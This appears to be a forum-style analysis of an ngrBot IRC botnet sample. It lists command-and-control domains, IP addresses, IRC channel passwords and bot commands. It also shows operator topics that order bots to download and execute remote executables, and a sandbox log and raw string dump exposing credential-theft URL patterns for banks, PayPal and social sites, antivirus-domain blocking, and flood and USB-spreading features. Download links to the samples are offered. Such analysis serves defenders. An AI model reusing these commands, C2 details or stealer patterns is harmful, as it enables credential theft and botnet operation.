d.xludakx.com(ngrBot hosted in Netherlands Amsterdam Leaseweb B.v )

This NgrBotnet conect to 3 domains and is aproximatly 100k:
Resolved : [d.xludakx.com] To [95.211.165.62]
Resolved : [ab.0n3mmm.com] To [95.211.165.62]
Resolved : [ab.0n3mmm.com] To [178.33.143.52]
Resolved : [ab.0n3mmm.com] To [109.75.176.231]
Resolved : [pusikuracbre.com] To [95.211.165.62]

Remote Host Port Number
199.15.234.7 80
95.211.165.62 4949 PASS ngrBot
109.75.176.231 4949 PASS ngrBot
178.33.143.52 4949 PASS ngrBot
ab.0n3mmm.com +666 uses ssl to conect to server
Outgoing connection to remote server: 95.211.165.62 TCP port 666

Commands:
NAZEL
NAZELup
KOSOMAKYAD
msn.set
msn.int
http.set
http.int
http.inj
mdns
stats
speed
logins
slow
ssyn
stop

NICK n{US|XPa}jgyxjah
USER jgyxjah 0 0 :jgyxjah

channels:
JOIN #darkfear## PASS redem
Now talking in #darkfear## Pass redem
Topic On: [ #darkfear## ] [ !m on !s -n !mod usbi on !j #d832 !j #b832 !j #u832 ]
Topic By: [ MrDD ]

Now talking in #d832
Topic On: [ #d832 ] [ !NAZEL http://img104.herosh.com/2012/01/18/318591232.gif E0BC8C7AF95AC4C37D5B9DDA8D09F7E3 ]
Topic By: [ MrDD ]

Now talking in #b832
Topic On: [ #b832 ] [ !mod bdns on !mdns www.dropbox.com !mdns dropbox.com !mdns 4shared.com !mdns www.4shared.com ]
Topic By: [ MrDDisBack ]

Now talking in #u832
Topic On: [ #u832 ] [ !NAZELup http://hotfile.com/dl/141636596/b286cc5/MrDD.exe A0D5E99F50E5F5244E5289834FFC7D5A ]
Topic By: [ MrDD ]

exe files just in case he delete samples from his links:
Download
Download
Download
Download
Download
Download

Here is the bonus all ngrBot strings
all functions like passwd stealing,spreading through alot of online messengers,ddos,botkilling etc
The best option in ngrBot is this :
username
*hackforums.*/member.php
Hackforums IT STEALS HF HECKERS PASSWORDS can u belive this ? lool
Enjoy ngrBot

Processes:
PID    ParentPID    User    Path    
--------------------------------------------------
C:Documents and SettingsMes documentsSexyMama-382423.exe    

Ports:
Port    PID    Type    Path    
--------------------------------------------------

Explorer Dlls:
DLL Path    Company Name    File Description    
--------------------------------------------------
No changes Found            

IE Dlls:
DLL Path    Company Name    File Description    
--------------------------------------------------
No changes Found            

Loaded Drivers:
Driver File    Company Name    Description    
--------------------------------------------------

Monitored RegKeys
Registry Key    Value    
--------------------------------------------------

Kernel31 Api Log
    
--------------------------------------------------
***** Installing Hooks *****    
719f74df     RegOpenKeyExA (HKLMSystemCurrentControlSetServicesWinSock2Parameters)    
719f80c4     RegOpenKeyExA (Protocol_Catalog9)    
719f777e     RegOpenKeyExA (00000093)    
719f764d     RegOpenKeyExA (Catalog_Entries)    
719f7cea     RegOpenKeyExA (000000000001)    
719f7cea     RegOpenKeyExA (000000000002)    
719f7cea     RegOpenKeyExA (000000000003)    
719f7cea     RegOpenKeyExA (000000000004)    
719f7cea     RegOpenKeyExA (000000000005)    
719f7cea     RegOpenKeyExA (000000000006)    
719f7cea     RegOpenKeyExA (000000000007)    
719f7cea     RegOpenKeyExA (000000000008)    
719f7cea     RegOpenKeyExA (000000000009)    
719f7cea     RegOpenKeyExA (000000000010)    
719f7cea     RegOpenKeyExA (000000000011)    
719f7cea     RegOpenKeyExA (000000000012)    
719f7cea     RegOpenKeyExA (000000000013)    
719f7cea     RegOpenKeyExA (000000000014)    
719f7cea     RegOpenKeyExA (000000000015)    
719f7cea     RegOpenKeyExA (000000000016)    
719f7cea     RegOpenKeyExA (000000000017)    
719f7cea     RegOpenKeyExA (000000000018)    
719f7cea     RegOpenKeyExA (000000000019)    
719f7cea     RegOpenKeyExA (000000000020)    
719f7cea     RegOpenKeyExA (000000000021)    
719f2623     WaitForSingleObject(77c,0)    
719f87c6     RegOpenKeyExA (NameSpace_Catalog5)    
719f777e     RegOpenKeyExA (00000039)    
719f835b     RegOpenKeyExA (Catalog_Entries)    
719f84ef     RegOpenKeyExA (000000000001)    
719f84ef     RegOpenKeyExA (000000000002)    
719f84ef     RegOpenKeyExA (000000000003)    
719f84ef     RegOpenKeyExA (000000000004)    
719f2623     WaitForSingleObject(774,0)    
719e1af2     RegOpenKeyExA (HKLMSystemCurrentControlSetServicesWinsock2Parameters)    
719e198e     GlobalAlloc()    
7c80b72f     ExitThread()    
7d2454bb     LoadLibraryA(MSVBVM60.DLL )=73370000    
73371c38     GetCommandLineA()    
73372f57     CreateMutex((null))    
7d23eab5     WaitForSingleObject(764,7530)    
733739f4     GetCommandLineA()    
7338d1b3     LoadLibraryA(C:WINDOWSsystem32VB6FR.DLL)=0    
7337452c     GetVersionExA()    
7337476c     LoadLibraryA(OLEAUT32.DLL)=770e0000    
772370b9     GetVersionExA()    
7723711c     GetCommandLineA()    
7337476c     LoadLibraryA(SXS.DLL)=77210000    
774efa66     LoadLibraryA(oleaut32.dll)=770e0000    
73376792     RegOpenKeyA (HKLMSOFTWAREMicrosoftVBAMonitors)    
77daeff6     RegOpenKeyExA (HKLMSOFTWAREMicrosoftVBAMonitors)    
733a304a     GetVersionExA()    
7337a15b     LoadLibraryA(KERNEL32)=7c800000    
7345d09c     CreateFileA(C:Documents and SettingsSexyMama-382423.exe)    
7337a15b     LoadLibraryA(msvbvm60)=73370000    
7345d34f     ReadFile()    
770fc957     LoadLibraryA(C:WINDOWSsystem32kernel32.dll)=7c800000    
7337a15b     LoadLibraryA(user32)=7e390000    
7c8165b3     WaitForSingleObject(74c,64)    
7c8191f8     LoadLibraryA(advapi32.dll)=77da0000    
28014c     WriteProcessMemory(h=754,len=400)    
28014c     WriteProcessMemory(h=754,len=10000)    
28014c     WriteProcessMemory(h=754,len=3800)    
28014c     WriteProcessMemory(h=754,len=2000)    
28014c     WriteProcessMemory(h=754,len=1e00)    
28014c     WriteProcessMemory(h=754,len=4)    
7337a4c5     GetCurrentProcessId()=1720    
7337bdfa     RegOpenKeyExA (HKLMSoftwareMicrosoftWindows)    
7337be1c     RegOpenKeyExA (HTML Help)    
7337be1c     RegOpenKeyExA (Help)    
7337c9ce     WaitForSingleObject(7e4,ffffffff)    
73373657     ExitProcess()    
***** Injected Process Terminated *****    

DirwatchData
    
--------------------------------------------------
WatchDir Initilized OK    
Watching C:DOCUME~1LOCALS~1Temp    
Watching C:WINDOWS    
Watching C:Program Files    
Modifed: C:WINDOWSSoftwareDistributionDataStoreDataStore.edb    
Modifed: C:WINDOWSSoftwareDistributionDataStoreLogsedb.chk    
Deteled: C:WINDOWSSoftwareDistributionDataStoreLogstmp.edb    
Modifed: C:WINDOWSSoftwareDistributionDataStoreLogsedb.log    
Created: C:WINDOWSPrefetchSEXYMAMA-382423.EXE-0B3EC77E.pf    
Modifed: C:WINDOWSPrefetchSEXYMAMA-382423.EXE-0B3EC77E.pf    
Created: C:DOCUME~1LOCALS~1TempJET6FC3.tmp    
Created: C:DOCUME~1LOCALS~1TempJET1A.tmp    
Deteled: C:DOCUME~1LOCALS~1TempJET1A.tmp    
Deteled: C:DOCUME~1LOCALS~1TempJET6FC3.tmp    
File: SexyMama-382423.exe
Size: 158386 Bytes
MD5: 284AC2DF706657EF31ECBB59E7563698
Packer: File not found

File Properties: CompanyName      #"$"a
FileDescription  fwk34
FileVersion      3.34.0132
InternalName     ASFa
LegalCopyright   
OriginalFilename ASK3.exe
ProductName      La!ly
ProductVersion   

Exploit Signatures:
---------------------------------------------------------------------------
Scanning for 19 signatures
Scan Complete: 316Kb in 0,016 seconds
Urls
--------------------------------------------------
http://%s/%s
http://%s/
http://
http://api.wipmania.com/ftp://%s:%s@%s:%d

RegKeys
--------------------------------------------------
gdatasoftware.
sunbeltsoftware.
SoftwareMicrosoftWindowsCurrentVersionRun
SoftwareMicrosoftWindowsCurrentVersionRun
SoftwareMicrosoftWindowsCurrentVersionPoliciesSystem
.DEFAULTSoftwareMicrosoftWindowsCurrentVersionRun

ExeRefs
--------------------------------------------------
File: SexyMama-382423_dmp.exe_
.exe
%windir%system32cmd.exe
&&%%windir%%explorer.exe %%cd%%%s
%0x.exe
Internet Explorer1explore.exe
pidgin.exe
wlcomm.exe
msnmsgr.exe
msmsgs.exe
opera.exe
chrome.exe
ieuser.exe
1explore.exe
f1refox.exe
.ipconfig.exe
verclsid.exe
regedit.exe
rundll32.exe
cmd.exe
regsvr32.exe
.exe
lol.exe
winlogon.exe
explorer.exe
y%s%s.exe
lsass.exe

Raw Strings:
--------------------------------------------------
File: SexyMama-382423_dmp.exe_
MD5:  0152bd6046d860acdfe21abc5438eac2
Size: 323586

Ascii Strings:
---------------------------------------------------------------------------
!This program cannot be run in DOS mode.
Rich:
.text
`.rdata
@.data
.reloc
WPVS
t1hh
_[^]
t-hP
QRPWV
RPQWV
QRPSV
txVhD
uaVhD
QRPSV
SVW3
u3h0
u!hh
h,eA
u3h0
u!hP
h,eA
PQRV
RPQW
u:WhD
u#WhD
QRPW
RPQV
RPQV
PQRV
RPQW
RSSh
vG9u
t0WSV
WVRj
WSPQR
vt9u
t0WSV
WVRj
WSPQR
gfff
WVRj
PWQR
u3h0
u!hh
h,eA
u3h0
u!hP
h,eA
>CAL 
uGh4
u5hHqA
hHqA
=MSG t
=SDG 
>MSG u`
h4eA
Wh4eA
h4eA
SVW3
SVW3
9:vP
G;9r
@W;F
Wj h
t&j,j
Wjdj
F4VP
SWf9
t-f;
t=hH
_^[]
|04+~4
_^[]
SVWP3
QWSVR
QPRWS
RPQS
WQRV
_^[]
_^[]
h8}C
Vh(|C
un9F
t2j h
L9_@vI
;_@r
h(|C
h(|C
h(|C
WVPQR
SQRj
STFU
A8j@
QWRPV
B0QPV
=tzA
PQRj
PQRj
SVWh
STFU
h(|C
Vh@P@
h,}C
L9^8vE
;^8r
hpP@
STFU
PL9^(v^
;^(r
9~0v/
;~0r
9^8v;
;^8r
9^@v2
;^@r
tu9]
RVWPQ
uXWV
QVWRP
u$WP
E$_^[
tpVW
uTVW
E$_^[
E$^[
E$_^[
h,eA
h,eA
QVWhP
h,eA
VWhP
h,eA
95hVA
QVht
8POST
tWWV
PQWj
Ph$eA
RPQVW
Ph$eA
RPQVW
WVRPS
u h(
QWRS
SVWh
SVW3
QhDeA
VWQh4
t"j V
SVWh
=USERt
=PASS
:Uu#Vh
8Pu.
=FEATt
=TYPEt
=PASVu
=STATt
=LISTu
uuhh
ucWVh
95LeA
RPQh
PQRh
QRPh
QVh:
Rh~f
_[^]
_[^]
F/PQ
~(WR
T0(RW
t=VW
Qh~f
u4SV
W$RP
tmQh
RSSh
t,PVQ
O,@PQ
TSVW3
WWWWh
F4RP
LSVW3
^<^[
V4QR
vJ9^,u
;F8v
N4PQ
F4RP
F@@PR
F,BRP
u-SSV
RSWWj
8httpu1
u$8H
Ph,eA
QRVP
RVPQ
Ph,eA
QRVP
RVPQ
Qh~f
SVWP
Rh~f
hh)A
h`)A
tlWP
Ph$`A
PhX`A
tlWP
Rh~f
_^[]
hp_A
SVWj
_^Yj
QPPPPh
h(*A
SVWj,
VjP
[@^]
Vj.P
[@^]
QRRj
RRRRf
[_^]
SVWh
@hXA
PhXA
PhDjA
h0*A
hXA
hXA
*t2:
VhH*A
Qh4*A
QSV3
95LYA
j Ph4XA
h`*A
Vj#S
_^[]
Wj*P
^[_]
h0+A
h$+A
SVWh
VVVV
WWVS
SVW3
RVh-
@PVj
PVh-
VhH+A
SVW3
@PVj
RVj"W
hT+A
hT+A
h|+A
ht+A
Rhh+A
QhX+A
@PVR
Wj j+V
<%u2
VVVV
hXA
hXA
SVWh
Rh(jA
QRPu
PQRu
h ,A
Phd^A
PPhP^A
9Q@w
hXA
hTXA
Php^A
8nu8h
Rhp^A
Qhp^A
hTXA
Rhp^A
8nu8h
hTXA
h@YA
PVRQh
PQRVh
RQPh
PQRSh
8_^[
ufh 
h(YA
Rhp^A
hTXA
Rhp^A
hTXA
h|,A
h|,A
hx,A
hx,A
Rh8aA
hp,A
hd,A
8httpuM
8:uE
u>8P
PhD,A
$_^[
 _^[
h@,A
hhaA
QRPh4,A
h,YA
h$YA
h<YA
QRPh4,A
h4YA
RPQh4,A
SVWh
8#t"
RVWP
SVWR
hx,A
hx,A
PQhp^A
Phd^A
QRhp^A
SVW3
h -A
hXA
PVhXA
t"h<-A
t"h0-A
Vh0dA
u5h(-A
VhDdA
VhddA
h$eA
h,eA
h0eA
{h4eA
MhDeA
,h8eA
t)h0u
SVW3
RPhD-A
QRPh
QRPh
PQRh
PhPcA
PRhhbA
QRPh0_A
SVW3
tRh|,A
uBPh
h -A
PWQRh,bA
SPQh
PSRh
PQhPcA
PhhbA
hx,A
tqCh
s[h5
hXA
PhXA
PhDjA
=XjA
hhXA
ht.A
SWhl.A
hd.A
h|XA
h|XA
Ph|XA
t'j j
h<.A
tgh 
h46A
SVWh
hx,A
Rh$6A
h/A
h/A
tb@Ph
Rhd/A
;< t
SVW3
Wh00A
h 0A
5djA
5pjA
5|jA
95djA
6`jA
taVW
h@0A
hD0A
Ph|`A
|Sj 3
tlSSSSSSSSSShL0A
hXA
PhXA
Phd0A
tU< u
u2Wh
h(3A
hT+A
hT+A
SVWh
hT+A
h,3A
u.h,3A
SVWh
RhP3A
PVQR
Qh8eA
h@3A
;SDG 
8SDG 
h,3A
Qhx3A
RPhl3A
QRhT3A
t!WV
_^[]
hhXA
hXA
PhXA
hl.A
hd.A
hl.A
hd.A
hhnA
h(5A
t!h85A
uyhP
u^hP
_^t)
9|:~
:~+w:~
tK@boL@
L@iBK@
%s.%s
pdef
%s.%S
%s.Blocked "%s" from removing our bot file!
%s.Blocked "%S" from removing our bot file!
block
bdns
CreateFileW
0123456789ABCDEF
i.root-servers.org
%s.Blocked "%s" from moving our bot file
%s.Blocked "%S" from moving our bot file
%s.p10-> Message hijacked!
%s.p10-> Message to %s hijacked!
%s.p21-> Message hijacked!
msnmsg
msnint
baddr
X-MMS-IM-Format:
CAL %d %256s
msnu
Done frst
ngr->blocksize: %d
block_size: %d
NtFreeVirtualMemory
NtAllocateVirtualMemory
NtQuerySystemInformation
LdrEnumerateLoadedModules
NtQueryInformationProcess
LdrGetProcedureAddress
NtQueryVirtualMemory
LdrLoadDll
NtQueryInformationThread
LdrGetDllHandle
RtlAnsiStringToUnicodeString
.pipe%s
kernel32.dll
GetNativeSystemInfo
%s_%d
%s_0
%s-Mutex
SeDebugPrivilege
ntdll.dll
NtGetNextProcess
%s-pid
%s-comm
NtResumeThread
PONG 
JOIN #
PRIVMSG #
%s.Blocked "%S" from creating "%S"
%s.Blocked "%S" from creating "%S" - "%s" will be removed at reboot!
.exe
%s.Detected process "%S" sending an IRC packet to server %s:%d.
%s.Detected process "%S" sending an IRC packet to server %s:%d (Target: %s).
PRIVMSG %255s
JOIN %255s
PRIVMSG
JOIN
%s:%d
NtSetInformationProcess
%s.%s%s
%S%s%s
HKCU
HKLM
%s.%S%S
%S%S%S
state_%s
%s.%s (p='%S')
pop3://%s:%s@%s:%d
popgrab
%s:%s@%s:%d
anonymous
ftp://%s:%s@%s:%d
ftpgrab
%s.%s ->> %s (%s : %s)
%s.%s ->> %s : %s
Directadmin
WHCMS
cPanel
blog
%s-%s-%s
ffgrab
iegrab
%s.Blocked possible browser exploit pack call on URL '%s'
%s.Blocked possible browser exploit pack call on URL '%S'
webroot.
fortinet.
virusbuster.nprotect.
gdatasoftware.
virus.
precisesecurity.
lavasoft.
heck.tc
emsisoft.
onlinemalwarescanner.
onecare.live.
f-secure.
bullguard.
clamav.
pandasecurity.
sophos.
malwarebytes.
sunbeltsoftware.
norton.
norman.
mcafee.
symantec
comodo.
avast.
avira.
avg.
bitdefender.
eset.
kaspersky.
trendmicro.
iseclab.
virscan.
garyshood.
viruschief.
jotti.
threatexpert.
novirusthanks.
virustotal.
login[password]
login[username]
*members*.iknowthatgirl*/members*
IKnowThatGirl
*youporn.*/login*
YouPorn
*members.brazzers.com*
Brazzers
clave
numeroTarjeta
*clave=*
*bcointernacional*login*
Bcointernacional
*:2222/CMD_LOGIN*
*whcms*dologin*
*:2086/login*
*:2083/login*
*:2082/login*
*webnames.ru/*user_login*
Webnames
*dotster.com/*login*
Dotster
loginid
*enom.com/login*
Enom
login.Pass
login.User
*login.Pass=*
*1and1.com/xml/config*
1and1
token
*moniker.com/*Login*
Moniker
LoginPassword
LoginUserName
*LoginPassword=*
*namecheap.com/*login*
Namecheap
loginname
*godaddy.com/login*
Godaddy
Password
EmailName
*Password=*
*alertpay.com/login*
Alertpay
*netflix.com/*ogin*
Netflix
*thepiratebay.org/login*
Thepiratebay
*torrentleech.org/*login*
Torrentleech
*vip-file.com/*/signin-do*
Vip-file
*pas=*
*sms4file.com/*/signin-do*
Sms4file
*letitbit.net*
Letitbit
*what.cd/login*
Whatcd
*oron.com/login*
Oron
*filesonic.com/*login*
Filesonic
*speedyshare.com/login*
Speedyshare
*pw=*
*uploaded.to/*login*
Uploaded
*uploading.com/*login*
Uploading
loginUserPassword
loginUserName
*loginUserPassword=*
*fileserv.com/login*
Fileserve
*hotfile.com/login*
Hotfile
*4shared.com/login*
4shared
txtpass
txtuser
*txtpass=*
*netload.in/index*
Netload
*freakshare.com/login*
Freakshare
login_pass
*login_pass=*
*mediafire.com/*login*
Mediafire
*sendspace.com/login*
Sendspace
*megaupload.*/*login*
Megaupload
*depositfiles.*/*/login*
Depositfiles
userid
*signin.ebay*SignIn
eBay
*officebanking.cl/*login.asp*
OfficeBanking
*secure.logmein.*/*logincheck*
LogMeIn
session[password]
session[username_or_email]
*password]=*
*twitter.com/sessions
Twitter
txtPassword
txtEmail
*&txtPassword=*
*.moneybookers.*/*login.pl
Moneybookers
*runescape*/*weblogin*
Runescape
*dyndns*/account*
DynDNS
*&password=*
*no-ip*/login*
NoIP
*steampowered*/login*
Steam
quick_password
quick_username
username
*hackforums.*/member.php
Hackforums
email
*facebook.*/login.php*
Facebook
*login.yahoo.*/*login*
Yahoo
passwd
login
*passwd=*
*login.live.*/*post.srf*
Live
TextfieldPassword
TextfieldEmail
*TextfieldPassword=*
*gmx.*/*FormLogin*
*Passwd=*
Gmail
FLN-Password
FLN-UserName
*FLN-Password=*
*fastmail.*/mail/*
Fastmail
pass
user
*pass=*
*bigstring.*/*index.php*
BigString
screenname
*screenname.aol.*/login.psp*
password
loginId
*password=*
*aol.*/*login.psp*
Passwd
Email
*service=youtube*
*google.*/*ServiceLoginAuth*
YouTube
login_password
login_email
*login_password=*
*paypal.*/webscr?cmd=_login-submit*
PayPal
%s / ?%d HTTP/1.1
Host: %s
User-Agent: %s
Keep-Alive: 300
Connection: keep-alive
Content-Length: 42
POST
Mozilla/4.0
Connection: Close
X-a: b
.PHYSICALDRIVE0
00100
SeShutdownPrivilege
NtShutdownSystem
This binary is invalid.
Main reasons:
- you stupid cracker
- you stupid cracker...
- you stupid cracker?!
ngrBot Error
shell32.dll
http
httpi
usbi
dnsapi.dll
DnsFlushResolverCache
http://%s/%s
http://%s/
HTTP
Host: 
POST /%1023s
{%s|%s%s}%s
n%s{%s|%s%s}%s
<br>
admin
isadmin
%s|%s|%s
[DNS]: Redirecting "%s" to "%s"
disabled
enabled
%s|%s
[Logins]: Cleared %d logins
#user
#admin
#new
removing
exiting
reconnecting
MOTD
bsod
disable
POP3 -> 
FTP -> 
[d="%s" s="%d bytes"] Download error: MD5 mismatch (%s != %s)
dlds
http://
rebooting
[Login]: %s
[DNS]: Blocked %d domain(s) - Redirected %d domain(s)
[Speed]: Estimated upload speed %d KB/s
SoftwareMicrosoftWindowsCurrentVersionRun
ngrBot
running
IPC_Check
shellopencommand=
shellexplorecommand=
icon=shell32.dll,7
useautoplay=1
action=Open folder to view files
shellexecute=
[autorun]
.lnk
%windir%system32cmd.exe
&&%%windir%%explorer.exe %%cd%%%s
/c "start %%cd%%RECYCLER%s
RECYCLER
.inf
%s%s
.%c:
%s%s
%sautorun.tmp
%sautorun.inf
%c:
gdkWindowToplevelClass
%0x.exe
comment-text
*bebo.*/c/home/ajax_post_lifestream_comment
bebo Lifestream
*bebo.*/c/profile/comment_post.json
bebo Comment
Message
*bebo.*/mail/MailCompose.jsp*
bebo Message
*friendster.*/sendmessage.php*
Friendster Message
comment
Friendster Comment
shoutout
*friendster.*/rpc.php
Friendster Shoutout
*vkontakte.ru/mail.php
vkontakte Message
*vkontakte.ru/wall.php
vkontakte Wall
message
*vkontakte.ru/api.php
vkontakte Chat
text
*twitter.*/*direct_messages/new*
Twitter Message
*twitter.*/*status*/update*
Twitter Tweet
status
*facebook.*/ajax/*MessageComposerEndpoint.php*
Facebook Message
msg_text
*facebook.*/ajax/chat/send.php*
Facebook IM
-_.!~*'()
Content-Length: 
%s.%s hijacked!
MSG %d %s %d
MSG %d %1s
SDG %d %d
Reliability: 
From: 
Content-Length: %d
X-MMS-IM-Format: 
SDG %d
bmsn
%s_0x%08X
RegCreateKeyExW
RegCreateKeyExA
URLDownloadToFileW
URLDownloadToFileA
PR_Write
DnsQuery_W
DnsQuery_A
InternetWriteFile
HttpSendRequestW
HttpSendRequestA
GetAddrInfoW
s3nd
CreateFileA
MoveFileW
MoveFileA
DeleteFileW
DeleteFileA
CopyFileW
CopyFileA
NtQueryDirectoryFile
NtEnumerateValueKey
%08x
OPEN
DnsFree
DnsQuery_A
DNSAPI.dll
FreeContextBuffer
InitializeSecurityContextW
FreeCredentialsHandle
DeleteSecurityContext
QueryContextAttributesW
AcquireCredentialsHandleW
EncryptMessage
DecryptMessage
InitializeSecurityContextA
ApplyControlToken
Secur32.dll
SHGetSpecialFolderPathW
SHGetFileInfoA
ShellExecuteA
SHELL32.dll
InternetCloseHandle
InternetReadFile
InternetQueryDataAvailable
HttpQueryInfoA
InternetOpenUrlA
InternetOpenA
HttpQueryInfoW
InternetQueryOptionW
WININET
.dll
PathAppendW
StrStrIA
PathAppendA
PathFindExtensionA
SHLWAPI.dll
WS2_32.dll
memset
wcsstr
strstr
wcsrchr
??3@YAXPAX@Z
atoi
sscanf
_strcmpi
printf
_snprintf
sprintf
strncpy
_memicmp
_wcsnicmp
_vsnprintf
_stricmp
strtok
strchr
_snwprintf
??2@YAPAXI@Z
_strnicmp
isxdigit
memmove
strncmp
toupper
strrchr
vsprintf
isalnum
strncat
MSVCRT.dll
lstrcpyA
MoveFileExA
lstrcmpA
WideCharToMultiByte
MoveFileExW
lstrcmpW
ExitThread
MultiByteToWideChar
GetFileAttributesA
SetFileAttributesW
GetFileAttributesW
LoadLibraryW
CloseHandle
SetFileTime
CreateFileW
GetFileTime
GetSystemTimeAsFileTime
WriteFile
GetModuleHandleW
GetLastError
ReadFile
GetTickCount
HeapAlloc
GetProcessHeap
HeapFree
lstrlenA
Sleep
WriteProcessMemory
ReadProcessMemory
InitializeCriticalSection
LeaveCriticalSection
EnterCriticalSection
HeapReAlloc
SetEvent
ConnectNamedPipe
CreateNamedPipeA
CreateEventA
DisconnectNamedPipe
GetOverlappedResult
WaitForMultipleObjects
CreateFileA
VirtualFreeEx
VirtualAllocEx
IsWow64Process
CreateRemoteThread
OpenProcess
WaitForSingleObject
ReleaseMutex
MapViewOfFile
OpenFileMappingA
CreateFileMappingA
InterlockedIncrement
UnmapViewOfFile
CreateMutexA
GetVersionExA
GetModuleFileNameW
InterlockedCompareExchange
CreateThread
GetWindowsDirectoryW
DeleteFileW
GetTempFileNameW
lstrcatW
lstrcpynW
DeleteFileA
SetFileAttributesA
lstrcpyW
LocalFree
LocalAlloc
lstrcpynA
SetFilePointer
DeviceIoControl
VirtualAlloc
CreateProcessW
ExitProcess
lstrcatA
GetVolumeInformationW
GetLocaleInfoA
FlushFileBuffers
CopyFileW
FindClose
FindNextFileA
FindFirstFileA
SetCurrentDirectoryA
LockFile
GetFileSize
CreateDirectoryA
GetLogicalDriveStringsA
OpenMutexA
GetModuleFileNameA
GetWindowsDirectoryA
KERNEL32.dll
MessageBoxA
wvsprintfA
wsprintfW
DefWindowProcA
DispatchMessageA
TranslateMessage
GetMessageA
RegisterDeviceNotificationA
CreateWindowExA
RegisterClassExA
USER32.dll
CryptGetHashParam
CryptDestroyHash
CryptHashData
CryptReleaseContext
CryptCreateHash
CryptAcquireContextA
AdjustTokenPrivileges
LookupPrivilegeValueA
OpenProcessToken
RegCloseKey
RegSetValueExW
RegCreateKeyExW
RegNotifyChangeKeyValue
RegSetValueExA
RegOpenKeyExA
ADVAPI32.dll
CoCreateInstance
CoInitialize
ole32.dll
 n;^
Qkkbal
i]Wb
9a&g
MGiI
wn>Jj
#.zf
+o*7
!!!!!!!!
@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@""""""""""""""""
@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@x
d.xludakx.com
MrDD
ab.0n3mmm.com
MrDD
pusikuracbre.com
MrDD
#darkfear##
redem
admin
1.1.0.0
MrDD
jkfdsfds67567dsf
NAZEL
NAZELup
KOSOMAKYAD
msn.set
msn.int
http.set
http.int
http.inj
mdns
stats
speed
logins
slow
ssyn
stop
{XA
+|XA
54YA
Z<YA
k8WA
PASS %s
[.ShellClassInfo]
CLSID={645FF040-5081-101B-9F08-00AA002F954E}
USER %s 0 0 :%s
NICK %s
JOIN %s %s
PART %s
PRIVMSG %s :%s
QUIT :%s
PONG %s
PING
PRIVMSG
[v="%s" c="%s" h="%s" p="%S"]
[d="%s" s="%d bytes"] Updated bot file "%S" - Download retries: %d
[d="%s" s="%d bytes"] Executed file "%S" - Download retries: %d
[Slowloris]: Starting flood on "%s" for %d
 minute(s)
[Slowloris]: Finished flood on "%s"
[UDP]: Starting flood on "%s:%d" for %d second(s)
[UDP]: Finished flood on "%s:%d"
[SYN]: Starting flood on "%s:%d" for %d second(s)
[SYN]: Finished flood on "%s:%d"
[USB]: Infected %s
[MSN]: Updated MSN spread message to "%s"
[MSN]: Updated MSN spread interval to "%s"
[HTTP]: Updated HTTP spread message to "%s"
[HTTP]: Injected value is now %s.
[HTTP]: Updated HTTP spread interval to "%s"
[Visit]: Visited "%s"
[DNS]: Blocked "%s"
[usb="%d" msn="%d" http="%d" total="%d"]
[ftp="%d" pop="%d" http="%d" total="%d"]
[RSOCK4]: Started rsock4 on "%s:%d"
[RSOCK4]: Stopped rsock4
[d="%s" s="%d bytes"] Update error: MD5 mismatch (%s != %s)
[d="%s"] Error downloading file [e="%d"]
[d="%s"] Error writing download to "%S" [e="%d"]
[d="%s" s="%d bytes"] Error creating process "%S" [e="%d"]
[d="%s" s="%d bytes"] File "%S" has an invalid binary type. [type="%d"]
[d="%s"] Error getting temporary filename. [e="%d"]
[d='%s"] Error getting application data path [e="%d"]
[Visit]: Error visitng "%s"
[FTP Login]: %s
[POP3 Login]: %s
[FTP Infect]: %s was iframed
[HTTP Login]: %s
[HTTP Traffic]: %s
[Ruskill]: Detected File: "%s"
[Ruskill]: Detected DNS: "%s"
[Ruskill]: Detected Reg: "%s"
[PDef+]: %s
[DNS]: Blocked DNS "%s"
[MSN]: %s
[HTTP]: %s
ftplog
poplog
ftpinfect
httplogin
httptraff
ruskill
rdns
rreg
httpspread
http://api.wipmania.com/
.pipe%08x_ipc
0;0G0O0V0d0n0s0
1)13181Y1e1u1|1
2C2c2
3 363M3j3u3
6(6/686J6O6T6m6
7 7(7O7V7_7
7=8T88
9#9:9W9^9f9~9
98:R:[:
;U<e<j<p<
<g=o=
>*>N>
?%?/?6?A?P?
0<0E0L0S0c0i0t0{0
2!3-4d4n4s4
5(5:5?5D5a5x5
6 6J6a6
7&7.7>7I7N7f7
1#2_2
8"8Q8X8g8q8
9':;:Y:
<'<1<H<X<x<
=%=7=D=K=Z=w=}=
>@>R>>m>
?1?<?B?j?
0g0g1
1"2Q2~2
203N3
424>4^4
8;9~9
:K:';A;_;
<4<><T<^<h<
=*=>=D=N=l=u=
>#>)>8>>>O>Y>^>p>u>
?8?L?c?u?
0$1-1H1N1_1n1
313Y3k3
414l4
515B5P5u5
676V6_6f6v6
889Y9r9
:-:G:
;#;(;2;7;<;A;F;W;
<5<?<^<
<W=l=|=
=d>o>{>
?/?U?`?p?
1P2T2X2
3?4a4h4
5A5H5|5
7U8]8f8}8
9'9-939q9
: :%:n:
;1;J;d;
<%<3<<<B<i<v<
=$=+=0===E=L=T=o=v=
=6>E>
?%?4??
0'0K0s0x0}0
091M1g1t1
3[3q3
3*494
4-575w5~5
5B6L6
6(7I7]7z7
848_9m9w9
:+:1:7:D:Q:V:e:t:
; ;,;8;L;Q;V;n;s;x;};
;5<B<]<w<
=5===B=N=S=g=l=
5"6-6B6L6Q6c6u6
7 70767=7L7R7
94:{:
'010
1.1F1^1
2(2>2P2b2t2
4K5f5
6=6K6Y6
7*7/7L7S7r7
8]8i8
9+9;9A9G9d9q9w9}9
9/:b:h:
;!;S;`;h;s;
;E<e<w<
=.=<=A=F=L=R=k=u=
>#>,>X>
?-??y?
42484T4`4f4
4X5]5|5
6-646D6Q6[6b6g6q6z6
9 9&9<9G9R9W99q9v9
9::G:M:b:j:z:
;.;6;;;B;H;S;c;k;
<+<F<T<`<
=3=E=Q=
>3>T>k>z>
?Z?r?{?
%0<0V0h0
141>1l1
3g3r3
34c4
5*585R5w5
6!6<6R6a6
7=7C7T7g7z7
8-9L9w9
9-:D:W:
;#;4;:;T;Z;
<#<(<-<2<7<P<j<w<
=)=.=K=[=`=}=
>+>I>V>[>s>z>
?*?H?T?a?g?u?
0,0J0Z0g0l0v0
1%101=1C1I1W1s1y1
2'212<2J2_2
3"3@3P3V3
4)4J4h4x4
535Q5s5
6!6.656D6S6`6m6z6
7?7E7
